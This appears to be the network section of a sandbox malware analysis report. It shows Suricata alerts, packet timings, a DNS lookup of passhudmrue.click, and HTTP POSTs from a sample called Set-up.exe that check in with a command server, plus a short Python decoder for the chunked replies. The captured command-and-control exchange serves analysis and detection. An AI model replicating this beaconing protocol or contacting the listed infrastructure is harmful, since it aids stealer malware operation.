2025-01-05T18:53:42.312298+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49851 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:44.138158+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49864 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:45.448469+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49875 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:46.922776+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49884 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:48.713395+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49900 | 172.67.178.174 | 443 | TCP
                                                                                                                      • Total Packets: 103
                                                                                                                      • 443 (HTTPS)
                                                                                                                      • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                      Jan 5, 2025 18:53:31.807148933 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.842551947 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.842587948 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.842601061 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.842607975 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.842639923 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.842658997 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.842664003 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.842705965 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.878729105 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.878812075 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.878870964 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.888444901 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.888454914 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.888465881 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.888470888 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:32.102076054 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.102127075 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:32.102205992 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.102744102 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.102761030 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:32.557522058 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:32.557598114 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.559283972 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.559299946 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:32.559528112 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:32.561142921 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.561418056 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.561450958 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.105984926 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.106070995 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.106149912 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.106285095 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.106303930 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.242950916 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.242978096 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.243058920 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.243520975 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.243534088 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.712960005 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.713035107 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.714747906 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.714752913 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.714946985 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.716492891 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.716646910 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.716672897 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.716720104 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.759330034 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:41.657480001 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:41.657557964 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:41.657618046 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:41.657891035 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:41.657906055 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:41.837721109 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:41.837769032 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:41.837846041 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:41.838231087 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:41.838248968 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.312220097 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.312298059 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.313644886 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.313652992 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.313921928 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.315162897 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.315337896 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.315371037 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.315438032 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.315444946 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.911799908 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.911897898 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.911941051 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.915333033 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.915354013 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:43.657958984 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:43.657991886 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:43.658058882 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:43.658452988 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:43.658464909 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.138065100 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.138158083 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.139529943 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.139535904 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.139766932 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.143225908 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.143354893 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.143374920 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.867696047 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.867784023 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.867855072 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.868066072 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.868081093 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.979696035 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.979728937 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.979794025 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.980161905 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.980174065 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.448398113 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.448468924 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:45.449928999 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:45.449939966 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.450176954 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.451491117 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:45.451577902 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:45.451582909 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.911498070 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.911588907 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.911643028 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:45.912199974 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:45.912211895 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.456536055 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.456567049 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.456661940 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.456975937 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.456984997 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.922677040 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.922775984 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.924259901 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.924266100 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.924493074 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.925961971 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.926919937 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.926954031 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.927119017 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.927148104 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.927261114 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.927305937 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.927634001 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.927661896 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.928067923 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.928098917 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.928584099 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.928613901 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.928623915 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.928637981 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.928769112 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.928793907 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.928812027 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.928992987 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.929023027 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.937340021 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.937539101 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.937567949 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.937597036 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.937639952 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.944581985 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:48.576553106 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:48.576653004 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:48.576709032 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:48.576900959 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:48.576917887 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:48.585688114 CET49900443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:48.585710049 CET44349900172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:48.585791111 CET49900443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:48.586107016 CET49900443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:48.586117983 CET44349900172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:48.713395119 CET49900443192.168.2.6172.67.178.174
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2025 18:53:28.751801968 CET | 58845 | 53 | 192.168.2.6 | 1.1.1.1
Jan 5, 2025 18:53:28.777117014 CET | 53 | 58845 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 5, 2025 18:53:28.751801968 CET | 192.168.2.6 | 1.1.1.1 | 0x8eef | Standard query (0) | passhudmrue.click | A (IP address) | IN (0x0001) | false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Jan 5, 2025 18:53:28.777117014 CET1.1.1.1192.168.2.60x8eefNo error (0)passhudmrue.click172.67.178.174A (IP address)IN (0x0001)false
                                                                                                                      Jan 5, 2025 18:53:28.777117014 CET1.1.1.1192.168.2.60x8eefNo error (0)passhudmrue.click104.21.31.168A (IP address)IN (0x0001)false
                                                                                                                      • passhudmrue.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49769 | 172.67.178.174 | 443 | 3940 | C:\Users\user\Desktop\'Set-up.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:29 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: passhudmrue.click
2025-01-05 17:53:29 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-05 17:53:30 UTC | 1140 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 17:53:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=e2i7vegbid0kk98tru1pe616c2; expires=Thu, 01 May 2025 11:40:08 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4uRDgM%2FSiFIQ4axeSbduq6dCs537BFtdS46N4Z0aS%2FVCcN4oApOzC%2F46k1UPkbClGcEL3AcowfvEJH%2FtB6An4k3TZYx%2BVqeFXpl6IUXvtNoff%2BvwenG6%2BA5YdkjqtJXYSk4DPw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd553fecabd0f80-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=18851&min_rtt=1654&rtt_var=10935&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1765417&cwnd=207&unsent_bytes=0&cid=5dabfb3a0eb22fa3&ts=783&x=0"
2025-01-05 17:53:30 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-05 17:53:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
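The responses in these sessions are sent with Transfer-Encoding: chunked, so the raw bytes the sandbox prints still carry the chunk framing: "32 0d 0a 6f 6b 0d 0a" is "2\r\nok\r\n" and "30 0d 0a 0d 0a" is the zero-length terminator chunk, which the "Data Ascii" column collapses to "2ok" and "0". The Python below is an added example, not code from the Joe Sandbox report, that turns the hex dump fragments back into the reply body and reports whether the terminator was seen. The fragments are copied from sessions 0, 1 and 2 of this report; the session 1 fragment is the start of its 0x1ca9-byte first chunk, which the report truncates, so the decoder returns what it recovered and flags the body as incomplete. Nothing is assumed about how the client uses the replies.

```python
import binascii

# Constructed from the "Data Raw" hex of the responses in sessions 0, 1 and 2 of the
# report. Each entry is one captured fragment exactly as the sandbox prints it; the
# session 1 fragment is cut short because the report truncates long bodies.
SESSION0_RESPONSE = ["32 0d 0a 6f 6b 0d 0a", "30 0d 0a 0d 0a"]
SESSION2_RESPONSE = [
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a",
    "30 0d 0a 0d 0a",
]
SESSION1_RESPONSE_TRUNCATED = ["31 63 61 39 0d 0a 52 53 34 6f 44 38"]


def hexdump_to_bytes(fragments):
    """Join the sandbox's space-separated hex byte dumps into one byte string."""
    return b"".join(binascii.unhexlify(f.replace(" ", "")) for f in fragments)


def dechunk(stream):
    """Decode an HTTP/1.1 chunked transfer-coded body.

    Returns (body, complete). complete is False when the stream ends before the
    zero-length terminator chunk, i.e. the capture was truncated; whatever bytes
    were recovered are still returned so they can be inspected.
    """
    body = bytearray()
    pos = 0
    while True:
        eol = stream.find(b"\r\n", pos)
        if eol == -1:                       # no size line left: truncated
            return bytes(body), False
        size_field = stream[pos:eol].split(b";")[0].strip()  # drop chunk extensions
        size = int(size_field, 16)          # chunk sizes are hex, e.g. "1ca9" = 7337
        pos = eol + 2
        if size == 0:                       # terminator chunk; trailers are ignored
            return bytes(body), True
        data = stream[pos:pos + size]
        body += data
        if len(data) < size:                # capture stopped inside this chunk
            return bytes(body), False
        pos += size + 2                     # skip the CRLF that ends the chunk


def decode_response(fragments):
    """Hex dump fragments -> (decoded body, complete flag)."""
    return dechunk(hexdump_to_bytes(fragments))


def split_status(body):
    """Split a plain-text reply such as b"ok 8.46.123.189" into (status, remainder)."""
    text = body.decode("ascii", errors="replace")
    status, _, rest = text.partition(" ")
    return status, rest


if __name__ == "__main__":
    for name, frags in [("session 0", SESSION0_RESPONSE),
                        ("session 1", SESSION1_RESPONSE_TRUNCATED),
                        ("session 2", SESSION2_RESPONSE)]:
        body, complete = decode_response(frags)
        print(f"{name}: body={body!r} complete={complete}")
```

The complete flag is the practical check: a short "ok" body with the terminator present is a full reply, whereas a body that ends mid-chunk means the report, not the server, cut it off, and the bytes should not be treated as the whole message.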


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49778 | 172.67.178.174 | 443 | 3940 | C:\Users\user\Desktop\'Set-up.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:31 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 78
Host: passhudmrue.click
2025-01-05 17:53:31 UTC | 78 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--DRON&j=637b55279021aab33278188cfa638397
2025-01-05 17:53:31 UTC | 1132 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 17:53:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=flniqcaeuqkp46p41tjp1ha5vr; expires=Thu, 01 May 2025 11:40:10 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2BSYa8qKQ97T%2F9FRJSE8JgN9rXHkjpLJwKbBi4pMyDXkZVm8AIAAmeMpFch3y8iIsAGTTvSZuU5v%2FjEOjc75EDfCFVb2Fz5lu9%2BbIhAToJ3dPUlyyTyMV6eEVJ3f0N20LY0Fyg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd5540b080041e6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1549&rtt_var=593&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=979&delivery_rate=1825000&cwnd=182&unsent_bytes=0&cid=a81faee5a585ac26&ts=1213&x=0"
2025-01-05 17:53:31 UTC | 237 | IN | Data Raw: 31 63 61 39 0d 0a 52 53 34 6f 44 38 34 37 72 6a 63 58 57 39 32 4f 4c 31 79 57 35 46 43 4e 41 31 35 71 64 71 58 78 50 32 67 2f 48 46 35 55 43 68 6b 2b 44 46 34 74 39 41 2b 43 46 57 51 2b 2f 37 52 62 4c 75 4f 42 66 4b 39 69 4f 6b 68 4d 77 35 42 54 47 31 6f 77 66 43 4a 6e 4f 33 39 49 53 57 4f 39 58 6f 49 56 63 69 50 2f 74 48 51 6e 74 49 45 2b 72 7a 6c 38 44 78 7a 48 6b 46 4d 4b 58 6e 63 78 4a 47 5a 36 4c 55 4a 50 5a 36 74 59 79 6c 5a 37 4e 72 6a 72 53 6a 33 38 69 6a 6e 67 61 7a 4e 49 57 6f 65 55 52 55 6f 46 50 68 4d 78 66 6e 67 49 54 31 74 6b 37 45 61 43 54 44 55 2b 73 36 77 56 66 76 65 42 4d 75 46 6c 4f 67 45 65 7a 5a 6c 62 43 31 74 32 4c 6a 31 73 63 53 31 4d 54 47 61 68 55 64 35 62 63 54 47 7a 37 55 41
Data Ascii: 1ca9RS4oD847rjcXW92OL1yW5FCNA15qdqXxP2g/HF5UChk+DF4t9A+CFWQ+/7RbLuOBfK9iOkhMw5BTG1owfCJnO39ISWO9XoIVciP/tHQntIE+rzl8DxzHkFMKXncxJGZ6LUJPZ6tYylZ7NrjrSj38ijngazNIWoeURUoFPhMxfngIT1tk7EaCTDU+s6wVfveBMuFlOgEezZlbC1t2Lj1scS1MTGahUd5bcTGz7UA
2025-01-05 17:53:31 UTC | 1369 | IN | Data Raw: 39 74 4d 68 79 36 48 6c 38 55 46 53 55 6f 56 34 62 54 47 73 78 4a 6d 34 37 4f 41 4a 54 4c 61 74 56 6a 41 30 31 4d 62 50 69 53 44 33 37 67 54 50 76 63 7a 4d 49 46 38 2b 62 57 51 42 53 63 54 4d 34 59 6e 77 76 52 55 31 69 71 31 48 4b 57 6e 5a 35 38 61 78 4b 4a 72 54 65 63 73 39 78 50 77 73 41 79 6f 49 64 46 52 4e 6e 66 44 46 6b 4f 33 38 4d 54 47 4f 74 56 4d 78 48 66 54 4b 30 36 56 38 31 2f 59 73 2f 37 32 77 32 42 78 66 48 6c 46 63 41 55 6e 51 34 4f 32 56 39 4a 30 77 4b 49 2b 78 65 31 42 55 74 65 5a 7a 70 58 54 6e 34 6b 48 44 56 49 53 4e 47 44 59 65 55 55 55 6f 46 50 6a 51 7a 61 33 67 73 51 30 6c 6c 70 30 76 4d 52 33 4d 30 75 76 35 4c 4f 2f 71 4d 4d 66 31 72 4d 67 34 58 7a 70 68 55 44 31 70 36 66 48 67 6f 66 44 38 4d 45 69 32 4e 56 4d 64 5a 66 79 36 2f 72 46
Data Ascii: 9tMhy6Hl8UFSUoV4bTGsxJm47OAJTLatVjA01MbPiSD37gTPvczMIF8+bWQBScTM4YnwvRU1iq1HKWnZ58axKJrTecs9xPwsAyoIdFRNnfDFkO38MTGOtVMxHfTK06V81/Ys/72w2BxfHlFcAUnQ4O2V9J0wKI+xe1BUteZzpXTn4kHDVISNGDYeUUUoFPjQza3gsQ0llp0vMR3M0uv5LO/qMMf1rMg4XzphUD1p6fHgofD8MEi2NVMdZfy6/rF
2025-01-05 17:53:31 UTC | 1369 | IN | Data Raw: 50 76 31 74 4e 67 34 62 79 70 38 64 52 42 31 35 4a 48 59 77 4f 77 31 50 58 6d 36 6d 47 2f 6c 57 65 7a 65 34 2b 67 30 68 75 70 39 79 36 47 31 38 55 46 54 4b 6b 6c 55 4d 54 33 45 78 4e 57 5a 31 4b 45 6c 46 5a 61 78 5a 77 56 42 78 4d 72 54 76 51 44 72 6d 6a 44 4c 6e 5a 44 30 43 48 6f 66 64 48 51 31 46 50 6d 52 32 57 57 77 73 44 6e 39 75 6f 6c 66 4c 51 7a 55 6d 38 66 55 4e 4f 66 6a 47 61 71 39 73 4e 41 30 52 79 4a 4a 58 42 46 68 30 4d 44 35 6d 65 44 56 44 54 6d 32 67 55 63 5a 59 65 7a 32 33 35 55 59 31 38 6f 59 7a 35 53 46 79 53 42 50 66 30 77 56 4b 61 58 6b 77 4f 32 63 35 45 6b 39 45 59 36 74 50 6a 45 6f 37 49 50 2f 72 51 58 36 73 78 6a 37 6d 59 54 63 43 45 4d 65 55 55 41 39 65 65 54 38 37 62 33 45 70 53 30 35 68 70 56 54 4b 56 58 49 39 75 76 35 49 4e 2f 69
Data Ascii: Pv1tNg4byp8dRB15JHYwOw1PXm6mG/lWeze4+g0hup9y6G18UFTKklUMT3ExNWZ1KElFZaxZwVBxMrTvQDrmjDLnZD0CHofdHQ1FPmR2WWwsDn9uolfLQzUm8fUNOfjGaq9sNA0RyJJXBFh0MD5meDVDTm2gUcZYez235UY18oYz5SFySBPf0wVKaXkwO2c5Ek9EY6tPjEo7IP/rQX6sxj7mYTcCEMeUUA9eeT87b3EpS05hpVTKVXI9uv5IN/i
